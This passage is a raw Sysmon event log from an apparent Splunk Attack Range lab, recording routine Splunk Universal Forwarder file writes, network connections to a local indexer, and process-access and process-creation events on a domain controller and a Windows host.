Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2AFE2EFAB86EDBCBA793B2FD9A9D753,SHA256=B84E99A6CBD9177818267B35A64CC68B9594B8B54CF94C946E572113A9005675,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214996Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:16.211{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA53C703B6DD822D34CC68DEAF4D9DBD,SHA256=4DEDBD9D2A68C812547E244367AE4C366B3587F66082E70901F7DEFB19F9E4A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:17.348{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=757160E4503D502B5E56A75B1DDDD2FC,SHA256=CA7DCF69D7A8B0B4B744DB5D4AA1BB86755B86459F5BDA6BCCFD6FCD23769617,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214998Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:14.681{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51227-false10.0.1.12-8000- 23542300x8000000000000000214997Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:17.289{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F716437168AF757971C4CCCB78BE5B62,SHA256=CA08A5F5F2A74924FC4226D21C2FA56B680B4B35705F67E22EA95A7E0BB70059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:18.395{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEDA4C1983CD16F3F281FE97FFE1F6FD,SHA256=1A4ED887ACDACCC50C991946270FB4DCA4BDDAB234558DFE33F62CCCF6EC699E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214999Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:18.321{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C664323E2D7665DED7639871A591E26B,SHA256=5BEF80CCD5B513FDEFA7A11877605C5FCFD329236F288CC8949FD3C24A6B2531,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215000Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:19.336{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15A7D2EBB2510F70E6D3053322A62F34,SHA256=2A3357F5D4D31746B2FE4ED0A3880DF7F51DB88F7725CA5BD10E54A33249B247,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.989{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F4F-6216-C904-000000003802}5788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.989{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.989{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.989{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.989{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.989{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0F4F-6216-C904-000000003802}5788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.989{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F4F-6216-C904-000000003802}5788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.990{C8EA50B7-0F4F-6216-C904-000000003802}5788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000285979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.786{C8EA50B7-0F4F-6216-C804-000000003802}13885948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.473{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F4F-6216-C804-000000003802}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.473{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.473{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.473{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.473{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.473{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0F4F-6216-C804-000000003802}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.473{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F4F-6216-C804-000000003802}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.474{C8EA50B7-0F4F-6216-C804-000000003802}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.427{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=155D610ED4F430ADFEC83A3AA99CFBBA,SHA256=BC76F41B8997B991D2097B0D598F7BD52E02A243EB8509731EFF6B5591FD96B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:16.669{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53291-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215001Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:20.367{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BBE9C2A7D566C987C58571B52713E38,SHA256=D3EAD286C111436AF4937E0BB32F43AD837A8D98340722A1A09B68E3AB7055D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.989{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F50-6216-CB04-000000003802}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.989{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.989{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.989{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.989{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 